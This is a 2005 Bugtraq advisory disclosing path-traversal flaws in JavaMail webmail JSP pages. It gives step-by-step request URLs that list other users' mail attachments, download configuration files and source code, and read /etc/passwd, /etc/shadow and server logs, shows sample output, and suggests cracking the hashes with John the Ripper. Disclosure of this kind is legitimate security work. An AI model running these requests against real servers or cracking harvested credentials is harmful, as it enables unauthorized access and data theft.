Bugtraq mailing list archives
Javamail Multiple Information Disclosure Vulnerabilities
From: Ricky Latt <ygnboyz () gmail com>
Date: 25 May 2005 02:24:27 -0000
Javamail Multiple Information Disclosure Vulnerabilities May 25, 2005 Yangon, Myanmar. Vulnerable Systems: * JavaMail API 1.3 * JavaMail API 1.2 * JavaMail API 1.1.3 Tested on Apache Tomcat/5.0.16 Possibly on all versions of Windows Failed to restrict to accessing other directory and files in ReadMessage.jsp File Name:<%=mp.getFileName()%><br> Type: <%=abc.getContent_Type()%><br> Size: <%=abc.getMsgSize()/1024%>Kb<br><a href="docdownloadfile.jsp?f=<%=abc.getFilePath() + "/" + abc.getFileName() %>" target="_new"> download </a><br> <%=abc.getFilePath() + "/" + abc.getFileName() %>" It will give attacker any file on system, because it said getFilePath() + "/" + abc.getFileName() 1. Open specific mailbox attachment 2. Download .jsp source code and configuration information of javamail 3. Target machine Root/Admin Compromise 4. Download server information 1. Open specific mailbox attachment When user download message from Javamail domain from webmail, attacker may notice URL http://example.com/docdownloadfile.jsp?f=/var/serviceprovider/web/mailboxesdir/user () example com/messageid123@user/filename.extension Then noticed URL lead to /var/folders so tried to switched folders. http://example.com/var/serviceprovider/web/mailboxesdir/user () example com/messageid123@user But got errors. So finally when reached to this URL http://example.com/mailboxesdir/user () example com/ Its made listing of user () example com attachments are there. Even unauthorized users are able to view specific mailbox attachment. Attacker need to know only username in order to get attachments listing. http://example.com/mailboxesdir/user2 () example com/ http://example.com/mailboxesdir/user3 () example com/ 2. Download configuration information of javamail And noticed that docdownloadfile.jsp redirect to where the file are located on server with the Parameter f. actually web browser got the redirect name http://example.com/Download?/var/serviceprovider/web/mailboxesdir/user () example com/messageid123@user/filename.extension This information lead to get web.xml http://example.com/Download?/var/serviceprovider/web/WEB-INF/web.xml Which give configuration information of javamail Download source code of jsp file http://example.com/Download?/var/serviceprovider/web/login.jsp http://example.com/Download?/var/serviceprovider/web/messagecontent.jsp http://example.com/Download?/var/serviceprovider/web/addbook.jsp http://example.com/Download?/var/serviceprovider/web/compose.jsp http://example.com/Download?/var/serviceprovider/web/folder.jsp 3. Target machine Root/Admin Compromise In UNIX /etc/passwd and /etc/shadow are important folder which A little bit curious and look in web browser typing that http://example.com/Download?/etc/passwd example of such a password file is: root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh Then Crack Unix password files with John the Ripper. John can be found practically anywhere. For example: try going to altavista.com and running a search for 'john the ripper'. http://example.com/Download?/etc/shadow root:$1$ $WLzQjSmuxB/:133334:0:22222:7::: adm:*:133334:0:22222:7::: ftp:*:133334:0:2222:7::: http://example.com/Download?/etc/group /etc/group file: root:x:0: daemon:x:1: bin:x:2: sys:x:3: adm:x:4: tty:x:5: disk:x:6: lp:x:7:lp mail:x:8: news:x:9: uucp:x:10: proxy:x:13: When attacker get information of root/admin user of target server and then attacker can lead to any attack. Attacker may do Website defacement, database altering, stealing and more. 4. Download server information http://example.com/Download?/var/log/boot.log http://example.com/Download?/var/log/maillog And more can be done . By Thet Aung Min Latt thetaung () gmail com http://thetaung.amyanmar.com
Current thread:
- Javamail Multiple Information Disclosure Vulnerabilities Ricky Latt (May 24)